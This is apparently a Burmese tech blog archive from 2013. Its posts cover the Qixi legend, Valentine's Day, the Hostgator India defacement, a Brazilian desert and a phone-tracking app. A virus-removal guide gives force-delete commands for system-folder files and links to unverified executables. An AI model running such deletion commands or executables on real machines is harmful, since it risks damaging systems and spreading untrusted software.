Thursday, 14 February 2013

ချစ်သူများနေ့ဆိုတာ (၂)




Zhinu လို့အမည်ရတဲ့ နတ်သမီးလေး တစ်ပါး ရှိပါတယ်။ ကောင်းကင်ဘုံက နတ်ဘုံနတ်နန်းမှာ နေရတဲ့ ဘဝကို သူ အတော်လေး ငြီးငွေ့နေပါပြီ။ ဒီလိုနဲ့ သာမန်ဘဝလေးအတိုင်းနေထိုင်တဲ့ လူ့ပြည်ကို အလည်ဆင်းပါတယ်။

ဒီလိုဆင်းလာတော့ မမျော်လင့်ပဲ ရိုးသားတဲ့ နွားကျောင်းသားလေး တစ်ဦးနဲ့ သွားတွေ့ပါတယ်။ Niulang လို့အမည်ရတဲ့ ရွယ်တူ လူငယ်လေး ဖြစ်ပြီး ချစ်ကြိုက်သွားကြပါတယ်။ ဒါကြောင့် Niulang နဲ့ Zhinu ဟာ ဘဝတစ်ခု အတူထူထောင်ဖို့ သဘောတူညီခဲ့ကြပြီး တစ်ယောက်ကို တစ်ယောက် မခွဲမခွာ ကတိတွေ ပေးကြပါတယ်။ ပျော်ရွှင်သာယာတဲ့ မိသားစု ဘဝ ဖြစ်ခဲ့ပြီး သားသမီး နှစ်ဦးတောင် ထွန်းကားပါတယ်။

ဒါတွေကို တစ်နေ့တော့ ကောင်းကင်ဘုံက နတ်သကြားက သိပါလေရော။ ၇ ယောက်မြောက် သမီးတော် ဖြစ်ပေမယ့် အင်မတန် ချစ်မြတ်နိုးသူ ဖြစ် ပါတယ်။ ဒါကြောင့် လူ့ပြည်မှာ လူသားနဲ့ ဘဝတစ်ခု ထူထောင် ဖို့အတွက်ကို လုံးဝ သဘောမတူပါဘူး။ ဒါကြောင့် မရရတဲ့ နည်းနဲ့ နတ်သမီးလေး Zhinu ကိုပြန်ခေါ်ပါတယ်။

ဒီလိုနဲ့ Zhinu ခမျာ သူ့ချစ်သူနဲ့ မိသားစုကို ခွဲခွာလို့ ကောင်းကင် ဘုံပေါ် ပြန်လည် ရောက်ရှိသွားပါတယ်။ နွားကျောင်းသားလေး Niulang တစ်ယောက် လုံးဝ လက်မလျော့ပါဘူး။ ချစ်သူ Zhinu ကို ပြန်ရဖို့ နည်းအမျိုးမျိုး ကြိုးစားပါတယ်။ သို့ပေမယ့် လူသားဖြစ်နေတော့ မစွမ်းသာပါဘူး။ သို့သော် သူ့ကိုကူညီမယ့်သူ ပေါ်လာတယ်။ အခြားသူ မဟုတ်ပါဘူး။ သူ့မွေးထားတဲ့ နွားတစ်ကောင်ဖြစ်ပါတယ်။

သူ့ကိုသတ်ပြီး သူ့အသားကို Niulang မှ အဆောင်ကဲ့သို့ ထားရင် မိုးပေါ် ပျံနိုင်ကြောင်းပြောပါတယ်။ သူ မသတ်ရက်ပါဘူး။ သို့ပေမယ့် နောက်ဆုံးတော့ သူချစ်တဲ့ နွားကိုယ်တိုင် အသက် စတေးနေတော့ ဝမ်းနည်းစွာပဲ သတ်လိုက်ပါတယ်။

သူတကယ်ပဲ မိုးပေါ်ပျံနိုင်သွားပါတယ်။ မိုးပေါ်ပျံပြီး သူ့ချစ်သူ နတ်သမီးထံ ကလေး ၂ ဦးယူဆောင်လို့ သွားသွားတွေ့ပါတယ်။ ဒီလိုတွေ့နေတာ ကိုလည်း နောက်ဆုံးတော့ နတ်မင်းကြီးတို့ သိရှိသွားပါတယ်။ ဒီတော့ ဒါကို တားမြစ်ဖို့အတွက် ကြံစည်ပါတယ်။

ဒါကြောင့် Zhinu နဲ့ Niulang ကြားမှာ တွေ့ဆုံလို့မရတောင် ကောင်း ကင် မြစ်တစ်စင်း ခြားထားလိုက်ပါတယ်။ ယင်းမြစ်ကို ကျော်လွန်လို့ Niulang တစ်ယောက် မပျံသန်းနိုင်ပါဘူး။ ဒါကြောင့် ယက်ကန်းရက်ပြီး ဝမ်းနည်းနေတဲ့ သူ့ချစ်သူ နတ်သမီး Zhinu တစ်ဖက်ကမ်းက သူ့မိသားစု ကြည့်ရင်း အမြဲငိုကြွေးနေပါတော့တယ်။ ခင်ပွန်း Niulang လည်း ကလေးနှစ်ဦးနဲ့အတူ သူ့ချစ်သူကို လှမ်းကြည့်လို့ ဝမ်းနည်းနေရပါတော့ တယ်။

သို့ပေမယ့် ကံကောင်းပါတယ်။ သူ့တို့ နှစ်ဦးရဲ့  ကွဲကွာနေတဲ့ ချစ်ခြင်းကို သနားစာနာတဲ့ ကောင်းကင်ပေါ်က ငှက်ကျားများဟာ တစ်ကြိမ်တစ်ခါ တိတ်တဆိတ် တွေ့ဆုံစေနိုင်ဖို့အတွက် တံတားအဖြစ် လာရောက် တာဝန်ထမ်းဆောင်ပေးပါတယ်။ တစ်နှစ်လုံးမှာမှ တစ်နေ့ (တစ်ည)ပဲ ဖြစ် ပါတယ်။ တကယ်ကို တစ်ညပါပဲ။ တစ်ည တွေ့ဆုံပြီးနောက် ယင်းငှက် တို့ ပြန်လည် ပျံသန်းတဲ့အတွက် ဒီလိုပဲ နှစ်တိုင်း တွေ့ရမယ့် တစ်ညကို သာ မျှော်နေကြပါတယ်။ ယင်းချစ်သူတို့ တွေ့ဆုံတဲ့ နေ့လေးဟာ ချစ်သူများနေ့လေးပဲ ဖြစ်ပါတယ်။

တရုတ်ရိုးရာ ဒဏ္ဍာရီ ပုံပြင်တစ်ခု ဖြစ်ပါတယ်။ နတ်သမီး Zhinu နဲ့ နွားကျောင်းသား Niulang ဆိုတာ Altari နဲ့ Vega အမည်ရ ကြယ် များ ဖြစ်ပြီး သားသမီး နှစ်ဦးကတော့ β နဲ့ γ ကြယ်များ ဖြစ်ပါတယ်။ Altari နဲ့ Vega ကြားမှာ ခြားထားတဲ့ ကောင်းကင် မြစ်ကတော့  နဂါးငွေ့တန်း ဂလက်စီ ဖြစ်ပါတယ်။ တစ်နှစ်မှာ တစ်ညတာ တွေ့ဆုံနိုင်အောင် ဖန်တီးပေး တဲ့ ငှက်များကတော့ နဂါးငွေ့တန်း ကလက်ဆီမှာ တစ်ကြိမ် မှာ ပေါ်လာတတ်တဲ့ Cygnus တန်း ဖြစ်ပါတယ်။

အမှန်တော့ တစ်နှစ်မဟုတ်ပါဘူး။ Luna month လို့ခေါ်တဲ့ လရဲ့  ရက် ၃၀ ဝန်းကျင်စာဖြစ်ပြီး လ ၇လ မြောက်ရဲ့  ၇ ရက်နေ့ဖြစ်ပါတယ်။ အကြမ်း ဖျင်းအားဖြင့် ၇ လူနာလ၊ ၇ရက် မြောက်နေ့လို့ မှတ်ယူနိုင်ပါတယ်။ များသောအားဖြင့် ကတော့ သြဂုတ်လအတွင်း ကျရောက်ပြီး နောက်ပိုင်း ကျတော့ အနောက်တိုင်းက ဖေဖော်ရီလ ၁၄ ရက်နေ့ ကို ရောပြီး ချစ်သူများနေ့ကို သတ်မှတ်ပါတယ်။ Altari နဲ့ Vega ကြယ်တို့ တွေ့ဆုံတဲ့ နေ့ ကိုလည်း ချစ်သူများနေ့အဖြစ် သီးသန့်လည်း ကျင်းပပါသေးတယ်။

ယင်းပွဲတော်ကို Qixi Festival (ချစ်သူများ ပွဲတော်)လို့ သတ်မှတ်ပြီး တရုတ်ပြည်နဲ့ တရုတ်လူမျိုးစုတို့ကြားမှာ ယနေ့တိုင် စည်စည်ကားကား ကျင်းပနေတဲ့ ပွဲဖြစ်ပါတယ်။ ချစ်သူတို့တင်မကပဲ ဇနီး၊ခင်ပွန်း၊သားသမီး အားလုံး ပါဝင်ပြီး တစ်ဦးကိုတစ်ဦး ပစ္စည်းပေးခြင်း၊ မုန့်ကျွေးခြင်း၊ ပျော်ပွဲ ရွှင်ပွဲ ကျင်းပခြင်း အစရှိသဖြင့် မိသားစု တစ်ခုလုံး သိုက်သိုက်ဝန်းဝန်း ကျင်းပပါတယ်။

ဒီချစ်သူများနေ့ - Qixi Festival ကတော့ တရုတ်ရိုးရာ ချစ်သူများနေ့ ဖြစ် ပါတယ်။ တရုတ် ရိုးရာဆိုပေမယ့် အာရှကနိုင်ငံအတော် များများမှာလည်း လွမ်းမိုးနေ့တဲ့ ချစ်သူများနေ့ တစ်နေ့လည်း ဖြစ်ကြောင်း သိရပါတယ်။
----
Ref: wiki
International news for myanmar

ချစ်သူများနေ့ဆိုတာ ..

နည်းပညာဆိုဒ်ဆိုပေမဲ့ နည်းပညာသမားတွေလဲ အသဲနဲ့ ပါဗျာ :P ဟီး နောက်တာ .. Valentine ဆိုတာ ဘာလဲ သိရအောင် တင်ပေးလိုက်ပါတယ်.. :D တကယ်တော့ ကျွန်တော့်အတွက် Valentine ဆိုတာ မရှိသေးပါဘူး(ချစ်သူမရှိ) [ကြွားတာ] :P 


ရောမ အင်ပါယာမှာ ဖြစ်ပါတယ်။ အေဒီ ၂၀၀ ကျော်ကာလက ဖြစ်ပြီး ရောမ စစ်ဘုရင်တို့ သွေးဆူနေ ချိန် ဖြစ်ပါတယ်။

စစ်တိုက်ဖို့သာ အချိန်တိုင်းတွေးနေပြီး ရောမအင်ပါယာကို ကြီးသထက် ကြီးအောင် ဖန်တီးပါတယ်။ စစ်တိုက်လေလေ စစ်သားလိုလေလေ၊ စစ်သားလိုလေလေ၊ ယောင်္ကျားတွေကို စုဆောင်း ရလေလေ၊ ယောင်္ကျားလေးတွေ စစ်ထဲဝင်တာများလေလေ၊ အမျိုးသမီး တွေကို လွမ်းလေလေ၊ အမျိုးသမီးနဲ့ မိသားစုကို လွမ်းလေလေ၊ အိမ်ပြန်ချင်လေလေ၊ အစရှိသဖြင့် သံယောဇဉ်နှောင်ကြိုးပေါင်း များစွာကြောင့် စစ်မှာ ခရီးမရောက်ဘူးလို့ အင်ပါယာကြီးထင် ယူဆပါတယ်။

ဒီတော့ အကောင်းဆုံးက သံယောဇဉ် ဖြတ်ခြင်းပါပဲ။ ယောင်္ကျားဆိုတာ စစ်တိုက်ဖို့မွေးတယ်။ ချစ်ဖို့၊ သံယောဇဉ်တွယ်မဟုတ်ဘူးဆိုတဲ့ တစ်ယူသန် တဲ့ ဆုံးဖြတ်ချက်နဲ့ တိုင်းပြည်မှာ မချစ်ရ၊ မကြိုက်ရ၊ မင်္ဂလာ မဆောင်ရ အစရှိတဲ့ ရူးကြောင်ကြောင် ဥပဒေများကို ထုတ်ပါတယ်။ ဥပဒေက ရူးကြောင်ပေမယပ့် လုပ်ရပ်ကတော့ ကြောက်စရာ ကောင်း ပါတယ်။ ချစ်တာ၊ကြိုက်တာ၊ မင်္ဂလာဆောင်တာ တွေ့ရင် ဆောင်ပေးသူရော၊ ချစ်ကြသူရော၊ အောင်သွယ် သူရော အားလုံးကို သေဒဏ်ပေးပါတယ်။

ဒီတော့ ဘယ်သူမှ မင်္ဂလာမဆောင်ရဲ၊ မချစ်ရဲတော့ဘူးလို့ အုပ်ချုပ်သူတို့က ထင်ပါတယ်။ အမှန်တော့ ထင်သလိုမဟုတ်ပါဘူး။ ငိုက်မရှက်၊ ငတ်မရှက် ပြီးတော့ ကြိုက်မရှက်ဆိုတဲ့ စကားပုံအတိုင်း ကြိုက်နေကြသူ၊ ချစ်နေကြသူတွေကို မတားနိုင်ပါဘူး။

အောင်သွယ်လုပ်ပေး၊ မင်္ဂလာဆောင်ပေးတဲ့ ခရစ်ယာန် ဘုန်းတော်ကြီး Valentine ကလည်း အဆင်သင့် ရှိနေတော့ တိတ်တိတ်ပုန်း မင်္ဂလာပွဲက ရောမမှာ ခေတ်စားလာပါတယ်။ ဒီတော့ Valentine ဆိုတာ လူချစ်လူခင်ပေါတဲ့ ဘုန်းတော်ကြီး ဖြစ်လာပါတယ်။ ဒီသတင်းကို တစ်နေ့တော့ အုပ်ချုပ်သူတွေ သိမယ်ဆိုတာကိုလည်း Valentine က ထည့်တွက် ပြီးသား ဖြစ်ပါတယ်။

တစ်နေ့ Valentine ကို ရောမ စစ်သည်တို့လာဖမ်း ပါတယ်။ နေ့စဉ်နှိပ်စက် မှု ကြောင့် သေလုနီးနီးဖြစ်နေပါပြီ။ သေဒဏ်ပေးခါနီးတစ်ရက်တော့ သူ့သမီးဆီကို Your Valentine ဆိုတဲ့ စာလေးပဲ ရေးထားတဲ့ ကဒ်ကလေး ပို့ပါတယ်။ ထောင်စောင့်ကလည်း Valentine ကို သနားပြီး ကူညီတဲ့သူ ဖြစ်ပါတယ်။ ဒီလိုနဲ့ အေဒီ ၂၆၉၊ ဖေဖော်ဝါရီလ ၁၄ ရက်နေ့ ကျတော့ သေဒဏ်ချမှတ်ခံရပြီး ကွယ်လွန် သွားပါတော့တယ်။

ဒီတော့ Valentine သေဆုံးမှုအတွက် ရောမမြို့ ကြီးတစ်ခုလုံး ဝမ်းနည်းကြပြီး သမိုင်းမှာ မေ့မရတဲ့ နေ့လေး ဖြစ်ခဲ့ပါတယ်။ Valentine ကွယ်လွန်ပြီးနောက် ရောမမှာ စစ်လိုလားကြမေယ့် မချစ်ရ၊မကြိုက်ရ၊ မင်္ဂလာ မဆောင်ရ ဥပဒေကတော့ တဖြည်းဖြည်းနဲ့ ပျောက်ကွယ် သွားပါတယ်။

ဒီတော့ နှစ်စဉ် ဖေဖော်ဝါရီလ ၁၄ ရက်နေ့ရောက်တော့ ချစ်သူနှစ်ဦးကြား၊ ချစ်ကြသူကြား တွေ့ဆုံအောင် အသက်ပေးလို့ ကြိုးစား စွမ်းဆောင် ဖန်တီးပေးခဲ့တဲ့ ဘုန်းတော်ကြီး Valentine ကို ဂါရဝပြု၊ လွမ်းဆွတ်တဲ့ အနေနဲ့ Valentine ကဒ်များ ပို့ကြပါတယ်။ From your valentine ဆိုပြီး ကဒ်ပို့တဲ့ ယဉ်ကျေးမှုက ခေတ်စားလို့လာပါတယ်။ ခရစ်ဘာသာဝင်တွေ မှာတင်မဟုတ်တော့ပဲ ကမ္ဘာအနှံ့မှာ အသိအမှတ်ပြုတဲ့နေ့ အထိမ်း အမှတ်လေး ဖြစ်ပြီး ဖေဖော်ဝါရီလ ၁၄ ရက်နေ့ တိုင်းမှာ ချစ်သူတို့ လက်ဆောင်လဲလှယ်ခြင်း၊ မုန့်ကျွေးခြင်း၊ ကဒ်ပေးခြင်း၊ ပါတီပွဲ ပြုလုပ်ခြင်း အစရှိသဖြင့် ယဉ်ကျေးမှုအမျိုးမျိုး ပေါ်ထွန်းလာ ပါတယ်။ ချောကလပ် ပေးတာဟာလည်း Valentine's Day ရဲ့  အထိမ်းအမှတ် ဖြစ်လာပါတယ်။

ယနေ့အချိန်မှာ Valentine's Day ကို ကမ္ဘာအနှံ့မှာ များသောအားဖြင့် ဖေဖော်ဝါရီလ ၁၄ ရက်နေ့မှာ ကျင်းပလေ့ ရှိကြောင်း သိရပါတယ်။
--
Ref: wiki
International news for myanmar

Hackers deface Hostgator Indian domain

ဟက်ကာ group တစ်ခုဖြစ်သော Cyber-ROG (cyber reloaded offensive gangster) အမည်ခံအဖွဲ့ တစ်ဖွဲ့ သည် hostgator.in ဆိုက်ဒ်ကို ဟက်ခ်ပြီး deface တင်ခြင်းပြုလုပ်နိုင်ခဲ့ပါတယ်. hostgaor.in သည် နာမည်ကြီး hostgator.com ရဲ့  india ဘက်ခြမ်း server ဆိုက်ဒ်များကိုထောက်ပံ့ပေးသောဆိုက်ဒ် တစ်ခုဖြစ်ပြီး india အတွက် localized billing ပါ support ပေးသော ဆိုက်ဒ်တစ်ခုဖြစ်ပါတယ်. ဆိုက်ဒ်ရဲ့  home page နှင့်တခြား page များပြုပြင်သည့်အပြင် သူတို့ ဘာကြောင့် deface ပြုလုပ်ရသလဲဆိုတဲ့ အကြောင်းအရင်းပါ ဖိုင်တစ်ခုကိုလည်း ftp မှတဆင့် added လုပ်ခဲ့တယ်လို့ သိရပါတယ်. THN သတင်းအရ သူတို့ ခုဒီသတင်းရေးနေချိန်မှာပင် အဲ့သည်ဖိုင်ကို ဖျက်လိုက်ပြီဖြစ်ကြောင်းသိရှိရပါတယ်.

deface page ပုံအရ အောက်ဆုံးစာသားဖြစ်သော “WE ARE ANONYMOUS” စာသား အရ hacktivist group တစ်ခုဖြစ်သော group anonymous နဲ့ ဆက်နွယ်ခြင်းမရှိပဲ anonymous ဆိုသောစကားလုံးအား အပျော်သဘောသုံးထားခြင်းသာ ဖြစ်နိုင်တယ်လို့ ယူဆရပါတယ်.

Mirror of hacker is also uploaded to Legend-h 
Source: THN
Credit: Big Boss

Monday, 11 February 2013

ဘရာဇီးနိုင်ငံရှိ Maranhenses အဖြူရောင်သဲကန္တာရ


ကန္တာရရယ်လို့ ပြောလိုက်ရင် အင်မတန်မှ ကြောက်စရာကောင်းပြီး သေမင်းတမန် နယ်မြေလို့တောင် တင်စား ကြတာကိုဘဲ ကြားဖူးကြမယ် ထင်တယ်နော်။ ကန္တာရကို စာတွေထဲမှာ ဖော်ပြကြရင်လည်း အင်မတန်မှ ခြောက်သွေ့ ကြမ်းတမ်းပြီး၊ နေအလွန့်အလွန်ပူပြင်းတဲ့ ဒေသ၊ မြွေတွေပေါပြီး အလွန် ထူထပ်တဲ့ သဲပြင်တွေချည်း ဖုံးလွှမ်းနေတဲ့ ဒေသ ၊ ရေတစ်စက်မှမရှိ၊ မိုးတစ်စက်မှ မရွာတဲ့ ဒေသ၊ အလွန် ကြောက်စရာ ကောင်းတဲ့ နေရာဒေသ တစ်ခုအဖြစ် ပုံဖော်ကြလေ့ရှိပါတယ်။ တကယ်တမ်းတော့ ခြောက်သွေ့ ပေမဲ့ သဲပြင်တွေနဲ့ လှပတဲ့ ဒေသဟာ ကန္တာရလည်း ရှိတယ်လို့ ဆိုရင်လည်း မမှားပါဘူး။

ဘရာဇီးနိုင်ငံရဲ့ Maranhenses အမျိုးသား သဲကန္တာရဟာ အင်မတန်မှ လှပပြီး အဖြူရောင်သဲပြင်ကြီးတွေ ဖုံးလွှမ်းနေတဲ့ ကန္တာရ တစ်ခုဖြစ်ပါတယ်။ ပြီးတော့ အဲဒီကန္တာရထဲမှာ ကြည်လင်ပြီး အေးမြနေတဲ့ ရေကန်ငယ် တစ်ခုလည်း ရှိပါတယ်။

အဖြူရောင် ကန္တာရဟာ ကန္တာရထဲကို ခရီးသွားလာသူတို့အတွက် နိဗ္ဗာန်ဘုံလေးတစ်ခုလို့တောင် တင်စားလို့ ရလောက်အောင် လှပသာယာတဲ့ နေရာလေးတစ်ခု ဖြစ်ပါတယ်။ ဘရာဇီးနိုင်ငံရဲ့ မြောက်ဘက်မှာ တည်ရှိပြီး ကီလိုမီတာ တစ်ထောင်ခန့်ကျယ်ဝန်းပါတယ်။ သို့သော်လည်း ၄င်းအဖြူရောင် ကန္တာရထဲမှာ ရေကန်ငယ်လေး ရှိပြီး မိုးလည်း ပုံမှန်ရွာသွန်းတတ်သော်လည်း သစ်ပင် အလွန် နည်းပါးပါတယ်။

သဲပုံတွေကြားက ပုံသဏ္ဍာန် အမျိုးမျိုးနဲ့ ရေအိုင်တွေဟာ မိုးရွာပြီးတာနဲ့ ရေတွေ ပြည့်လာတတ်ပြီး အပြာရောင် ကနေ အစိမ်းရောင်အထိ မိမိကြည့်ရှုတဲ့နေရာ အနေအထားကိုလိုက်ပြီး အရောင် ပြောင်းနေတာ ကို တွေ့ရပါတယ်။အဖြူရောင်သဲပြင်တွေကြားက မြင်ရတဲ့ ရေအိုင်တွေဟာ ကျောက်မျက် ရတနာ တောက်ပနေသလိုမျိုး လှပစွာ တွေ့မြင်နိုင်တာ ဟာလည်း အဖြူရောင်ကန္တာရရဲ့ ထူးခြားစွာ လှပတဲ့ အချက်ဘဲဖြစ်ပါတယ်။

သာယာလှပတဲ့ အဖြူရောင်ကန္တာရကို ဘရာဇီးအစိုးရရဲ့ ကာကွယ်စောင့်ရှောက်တဲ့အစီအစဉ်အနေနဲ့ မည်သည့်ကိုယ်ပိုင်ကားတွေကိုမှ ဝင်ခွင့်မပြုပါဘူး။ ဥယျာဉ်က စီစဉ်ထားတဲ့ လေးဘီး ထရပ်ကားတွေနဲ့သာ အတွင်းထဲကို ဝင်ရောက်ခွင့်ရှိပါတယ်။

ကန္တာရထဲက ကြည်လင် သန့်စင်နေတဲ့ ရေအိုင်ထဲမှာ ငါးတွေကိုတောင် တွေ့နိုင်ပါတယ်။ ဒီလောက်တောင် လွင်တီးခေါင် သဲကန္တာရထဲ ငါးတွေကို ဘယ်က ဘယ်လို ဝင်ရောက်လာသလဲ စဉ်းစားစရာပါ။ သို့ပေမဲ့ ဖြစ်နိုင်တာက ပင်လယ်ပျော်ငှက်တွေဟာ ငါးတွေကို ပင်လယ်ကနေ စားသောက်ပြီး ငါးထဲမှာ ပါလာတတ်တဲ့ ငါးဥတွေဟာ ငှက်တွေရဲ့ ဝမ်းထဲကိုရောက်သွားပြီး မစင်မဖြစ် ရေကန်နား စွန့်ပစ်မိရာက ၄င်း ငါးဥကနေ ငါးတွေ ရှင်သန်ပေါက်ဖွား လာတာလည်း ဖြစ်ကောင်းဖြစ်နိုင်ပါတယ်။

မျက်စိတဆုံး ကျယ်ပြောလှတဲ့ သဲပြင် ဖြူလွလွတွေကြားမှာ စိမ်းစိုစိုရေကန်တွေ တည်ရှိနေတာဟာ ရောက်လာသူတိုင်းရဲ့ စိတ်နှလုံးကို သိမ်းကျုံးဆွဲငင်နိုင်စွမ်း ရှိလှတဲ့အတွက် ဘရာဇီးက သဘာဝအလှအတိုင်း တည်ရှိဆဲ အဖြူရောင်ကန္တာရကို လာရောက်လည်ပတ်သူတွေ တစ်နေ့တစ်ခြား များပြားလို့လာပါတယ်။ လာရောက်လည်ပတ်သူတွေကြောင့် အဖြူရောင်ကန္တာရရဲ့ အလှအပတွေ ပျက်စီးမှာ၊ ရေကန်တွေ ညစ်နွမ်းမှာ၊ ခမ်းခြောက်မှာကိုတော့ တာဝန်ရှိသူများက ထိမ်းသိမ်း စောင့်ရှောက် ရမှာ ဖြစ်ပါတယ်။ အခါအခွင့် သင့်ရင်တော့ အဖြူရောင် သဲသောင်ပြင်တွေနဲ့ လှပနေတဲ့ ကန္တာရထဲကို ရောက်ဖူးချင်ပါသေးတယ်...

Credit to:အစိမ်းရာင်လွင်ပြင်

Sunday, 10 February 2013

Gothere Myanmar Software (Andriod)

ဖုန်းတစ်လုံး၏ အဓိက တည်နေရာကို အခြားဖုန်းတစ်လုံး သို့မဟုတ် ဖုန်းနှင့် ချိတ်ဆက်ထားသည့် ကွန်ပျူတာမှ တစ်ဆင့် အချင်းချင်း ချိတ်ဆက်မှု ရှိပါက တည်နေရာကို ခြေရာခံ ဖော်ပြပေးနိုင်မည့် Gothere Myanmar Software လေးနဲ့ မိတ်ဆက်ပေးချင်ပါတယ်..။ အဆိုပါ Software ကို Android ဖုန်းများတွင် ထည့်သွင်းနိုင်မည် ဖြစ်ပြီး ဖုန်းပျောက်သော အချိန်တွင် ရှာဖွေနိုင်ခြင်း၊ မိဘများအနေဖြင့် မိမိကလေး ရောက်ရှိနေသည့် နေရာကို သိရှိနိုင်ခြင်း စသည်ဖြင့် အသုံးပြုနိုင်မည် ဖြစ်ပါသည်။


“ဒီ software ကနေ အခြားဖုန်းတစ်လုံးရဲ့ တည်နေရာကို သိချင်တယ်ဆိုရင် ကိုယ်သိချင်တဲ့ ဖုန်းပိုင်ရှင်ဆီကို message လှမ်းပို့ရပါမယ်။ တည်နေရာကို သိချင်တယ်။ လက်ခံမလား စသည်ဖြင့်ပေါ့။ ဟိုဘက်ဖုန်းက လက်ခံတဲ့ message ပြန်လာပြီဆိုရင် ဒီဖုန်းနှစ်လုံးကြားထဲမှာ software က အလုပ်လုပ်ပြီး သိချင်တဲ့ ဖုန်းရဲ့ တည်နေရာကို အမြဲပြပေးသွားမှာပါ။ ဒါ့အပြင် realtime mobile movement tracking လည်း လုပ်လို့ရတဲ့အတွက် ကုမ္ပဏီဝန်ထမ်းများ ကားအလွဲသုံးစားလုပ်ပြီး သွားလာတာ၊ Marketing Staff များ သတ်မှတ်ထားတဲ့ နေရာတွေမှာ မရှိတာတွေကိုပါ ချက်ချင်း သိရှိနိုင်ပါတယ်” ဟု အဆိုပါ software ကို ရေးသားသော Giga Gates Co.,Ltd မှ project manager တစ်ဦးက ပြောသည်။

ထို့အပြင် အဆိုပါ Software ထည့်သွင်းထားပါက မိမိရောက်နေသော နေရာသို့ လာရောက်ရန် လမ်းမသိသော မိတ်ဆွေထံသို့ Location Sharing ပြုလုပ်၍ ဖုန်းမှတစ်ဆင့် လမ်းပြပေးနိုင်မည် ဖြစ်ပြီး GPS Tracking မှာ သွားးခဲ့သည့် နေရာများကို ပြန်လည် ကြည့်ရှုနိုင်သဖြင့် ကားများတွင် တပ်ဆင် အသုံးပြုနိုင်ခြင်း၊ အလုပ်သမားများကို အပြင်လွှတ်ပြီးသည့်အခါ ပြန်လည် ကြည့်ရှုနိုင်ခြင်းများ ပြုလုပ်နိုင်မည် ဖြစ်ပါသည်။

မြေပုံပေါ်တွင်လည်း မြို့၊ လုပ်ငန်း၊ အဆောက်အဦများကို အလွယ်တကူ ရှာဖွေနိုင်ပြီး Map Info ခြောက်သောင်းကျော်ခန့် သွင်းထားကြောင်း သိရသည်။ မိမိ ရောက်ရှိနေသည့် နေရာကို ကိုယ်ကိုယ်တိုင် မသိပါကလည်း ရောက်ရှိရာ နေရာအနီးရှိ ဟိုတယ်၊ စားသောက်ဆိုင်၊ ဘတ်စ်ကား မှတ်တိုင်များကို အလွယ်တကူ ရှာဖွေနိုင်မည် ဖြစ်ပါသည်။ ထိုသို့ အသုံးပြုရန်အတွက် GPS  ဖွင့်ရန် သို့မဟုတ် Internet Connection ချိတ်ဆက်ရန် လိုအပ်သော်လည်း Battery Saving, Cost Saving ဖြစ်စေရန် Assistant Location Sensing (ALS) စနစ်ကို ထည့်သွင်းပေးထားကြောင်း သိရသည်။ ယခု ဖော်ပြခဲ့ပြီးသော feature များအပြင် အသုံးပြုသူများအတွက် အဆင်ပြေမည့် feature များကိုပါ ထပ်မံ ထည့်သွင်းပေးထားပါသည်။

Download link >>  http://go-there-myanmar.com/download/GOthere-Myanmar-All-In-One.apk
Credit > http://aunghtunoo.blogspot.com/

# loikaw virus သတ်တဲ့ Software

Loikawhacking.day.com , Loikaw.exe Virus Removal Tool
အပေါ်ကပုံအတိုင်း တက်လာခဲ့မယ်ဆိုရင်တော့ loikaw hacking day virus လေးပါ။ အဲဒါဆိုရင်တော့ အောက်ကပုံစံအတိုင်း virus information ဆိုတဲ့ txt file လေးဟာကွန်ပျူတာပေါ်မှာရောက်နေပါတယ်

my computer icon ပုံစံလေးဟာလည်းပြောင်းသွားပါတယ်။ virus information ဆိုတဲ့ txt file လေးကိုဖွင့်လိုက်ရင်

Hi fri ""

It is nice to meet you . . . .

I ko thi lar, see yin kaw kin mar lar, i ka talk khin tat tal nor . . . .

I ka girl nor, chit mar lar . . . . .

I ka u computer ko bar ma, ma loat par buu khin lo Virus write pi talk sa tar ko , he` he` . . . .

Sate so ya buu nor i ka di lo pae` . . . . ya tal ma hote lar

I name ko thi chin lar? pyaw pya par buu; bar lo pyaw pya ya mar lae`

u ka boy lar, age ka kaw?

i ka 18age girl i gamil ka comput5r3razygirl@gmail.com

bye bye . . . luu soe . . . fly kiss . .


ပြီးတော့အလုပ်လုပ်နေရင်လည်းဒီပုံလေးပေါ်လာပါတယ်


restart တွေတော့မကျပါဘူး ကိုယ့်ဘာသာကိုယ် restart ချလိုက်ရင်တော့

အကုန်ပြန်ပေါ်လာတယ် desktop ဘက်ဂရောင်းဟာ ဘာပုံပဲတင်တင်ထား

restart ချလိုက်ရင် အမည်းရောင်ပဲဖြစ်နေပါတယ် နော်ပြီး သူက ဗိုင်းရပ်ဆော့ဝဲ

ကိုလည်းဖျောက်ထားသေးပါတယ်။ အဲဒါတွေဖြစ်ခဲ့ရင်တော့ Task Manager , Folder Option register တွေ

commant prompt တစ်ခုမှမရပါဘူးထို Virus ၀င်ရောက်တိုက်ခိုက်ခြင်းခံရပါက အောက်တွင်ပေးထားသော Download link မှ LoikawVirusRemoval.zip ကို Download လုပ်ပြီး Virus ၀င်ရောက်ထားသော ကွန်ပျူတာတွင် Loikaw Virus Removal.exe ကို Run လိုက်ခြင်းဖြင့် Virus ကို အပြီးတိုင် ရှင်းလင်းနိုင်ပါမယ်ဗျာ.....


Ref: www.ourmandalay.net



နောက်တစ်နည်းက


windows ပြန်တက်လာတဲ့အခါ


* Click Start

* Click Run

* cmd ရိုက်ပြီး enter ခေါက်လိုက်ပါ


ပြီးရင် ပေါ်လာတဲ့ command ထဲမှာ


attrib c:\windows\loikaw.exe -r-s-h

del c:\windows\loikaw.exe /s/f/a


attrib c:\windows\system32\loikaw.exe -r-s-h

del c:\windows\system32\loikaw.exe /s/f/a


attrib c:\windows\autorun.inf -r-s-h

del c:\windows\autorun.inf /s/f/a


ရိုက်ပြီး တော့ သတ်ကြည့်လိုက်ပါ . . .


 ဒီနည်းတော့ သိပ်မသေချာဘူး....


credit : ရွေအိမ်စည်စာကြည့်တိုက်




Thursday, 7 February 2013

Microsoft and Symantec Busted Cyber Crime Ring

Microsoft နဲ့ Symantec တို့လို နည်းပညာ ကုမ္ပဏီနှစ်ခုက ဆာဗာတချို့ကို ပိတ်ချပြီးတော့ Cyber Crime Ring တစ်ခု ကို အတူတကွ ဖြိုခွဲပစ် လိုက်နိုင်တယ်လို့ ဆိုပါတယ်။
